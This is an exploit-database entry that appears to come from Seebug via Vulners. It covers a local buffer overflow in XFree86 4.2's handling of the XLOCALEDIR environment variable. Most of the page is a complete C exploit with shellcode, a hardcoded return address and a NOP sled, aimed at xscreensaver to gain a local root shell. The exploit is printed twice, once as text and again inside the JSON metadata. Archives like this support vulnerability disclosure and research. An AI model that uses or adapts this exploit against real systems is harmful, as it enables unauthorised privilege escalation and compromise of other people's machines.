Search...

XFree86 4.2 XLOCALEDIR Local Buffer Overflow Vulnerability (2)

2014-07-01T00:00:00

ID SSV:76126
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/7002/info
 
Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable.
 
A local attacker can exploit this vulnerability by setting the XLOCALEDIR environment variable to an overly long value. When the vulnerable utilities are executed, the buffer overflow vulnerability will be triggered.

/*
**
** Tested on rh 7.3 using XFree86
** xscreensaver vulnerability
** AUTHORS: Angelo Rosiello (Guilecool) & deka
** REQUIRES: X must be run!
** EFFECTS: local root exploit!
**
** deka is leet brother, thank you :&#62;
** MAIL: guilecool@usa.com
**
*/

#include &#60;stdio.h&#62;
#include &#60;string.h&#62;
#include &#60;unistd.h&#62;
#include &#60;stdlib.h&#62;
#include &#60;sys/types.h&#62;
#include &#60;sys/stat.h&#62;
#include &#60;fcntl.h&#62;

#define RETADDR 0xbfffdf20 //change it if u need

char shellcode[] =
 &#34;\x55\x89\xe5\x55\x89\xe5\x83\xec\x28\xc6\x45\xd8\x2f\xc6\x45\xdc&#34;
 &#34;\x2f\xc6\x45\xd9\x5f\xc6\x45\xda\x5a\xc6\x45\xdb\x5f\xc6\x45\xdd&#34;
 &#34;\x5f\xc6\x45\xde\x5f\x83\x45\xd9\x03\x83\x45\xda\x0f\x83\x45\xdb&#34;
 &#34;\x0f\x83\x45\xdd\x14\x83\x45\xde\x09\x31\xc0\x89\x45\xdf\x89\x45&#34;
 &#34;\xf4\x8d\x45\xd8\x89\x45\xf0\x83\xec\x04\x8d\x45\xf0\x31\xd2\x89&#34;
 &#34;\xd3\x89\xc1\x8b\x45\xf0\x89\xc3\x31\xc0\x83\xc0\x0b\xcd\x80\x31&#34;
 &#34;\xc0\x40\xcd\x80&#34;;

int main()
{
        char buf[4076];
        unsigned long retaddr = RETADDR;

        memset(buf, 0x0, 4076);
        memset(buf, 0x41, 4072);
        memcpy(buf+2076, &retaddr, 0x4);
        setenv(&#34;XLOCALEDIR&#34;, buf, 1);
        memset(buf, 0x90, 4072);
        memcpy((buf+4072-strlen(shellcode)), shellcode, strlen
(shellcode));
        setenv(&#34;HAXHAX&#34;, buf, 1);
        execl(&#34;/usr/X11R6/bin/xscreensaver&#34;, &#34;xscreensaver&#34;, 0);
}

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-76126", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "XFree86 4.2 XLOCALEDIR Local Buffer Overflow Vulnerability (2)", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-76126", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n source: http://www.securityfocus.com/bid/7002/info\r\n \r\nSeveral XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment variable.\r\n \r\nA local attacker can exploit this vulnerability by setting the XLOCALEDIR environment variable to an overly long value. When the vulnerable utilities are executed, the buffer overflow vulnerability will be triggered.\r\n\r\n/*\r\n**\r\n** Tested on rh 7.3 using XFree86\r\n** xscreensaver vulnerability\r\n** AUTHORS: Angelo Rosiello (Guilecool) & deka\r\n** REQUIRES: X must be run!\r\n** EFFECTS: local root exploit!\r\n**\r\n** deka is leet brother, thank you :>\r\n** MAIL: guilecool@usa.com\r\n**\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n\r\n#define RETADDR 0xbfffdf20 //change it if u need\r\n\r\nchar shellcode[] =\r\n "\\x55\\x89\\xe5\\x55\\x89\\xe5\\x83\\xec\\x28\\xc6\\x45\\xd8\\x2f\\xc6\\x45\\xdc"\r\n "\\x2f\\xc6\\x45\\xd9\\x5f\\xc6\\x45\\xda\\x5a\\xc6\\x45\\xdb\\x5f\\xc6\\x45\\xdd"\r\n "\\x5f\\xc6\\x45\\xde\\x5f\\x83\\x45\\xd9\\x03\\x83\\x45\\xda\\x0f\\x83\\x45\\xdb"\r\n "\\x0f\\x83\\x45\\xdd\\x14\\x83\\x45\\xde\\x09\\x31\\xc0\\x89\\x45\\xdf\\x89\\x45"\r\n "\\xf4\\x8d\\x45\\xd8\\x89\\x45\\xf0\\x83\\xec\\x04\\x8d\\x45\\xf0\\x31\\xd2\\x89"\r\n "\\xd3\\x89\\xc1\\x8b\\x45\\xf0\\x89\\xc3\\x31\\xc0\\x83\\xc0\\x0b\\xcd\\x80\\x31"\r\n "\\xc0\\x40\\xcd\\x80";\r\n\r\nint main()\r\n{\r\n char buf[4076];\r\n unsigned long retaddr = RETADDR;\r\n\r\n memset(buf, 0x0, 4076);\r\n memset(buf, 0x41, 4072);\r\n memcpy(buf+2076, &retaddr, 0x4);\r\n setenv("XLOCALEDIR", buf, 1);\r\n memset(buf, 0x90, 4072);\r\n memcpy((buf+4072-strlen(shellcode)), shellcode, strlen\r\n(shellcode));\r\n setenv("HAXHAX", buf, 1);\r\n execl("/usr/X11R6/bin/xscreensaver", "xscreensaver", 0);\r\n}\r\n\r\n\n ", "id": "SSV:76126", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T14:51:35", "reporter": "Root", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2017-11-19T14:51:35", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T14:51:35", "rev": 2}, "vulnersScore": 0.1}, "references": []}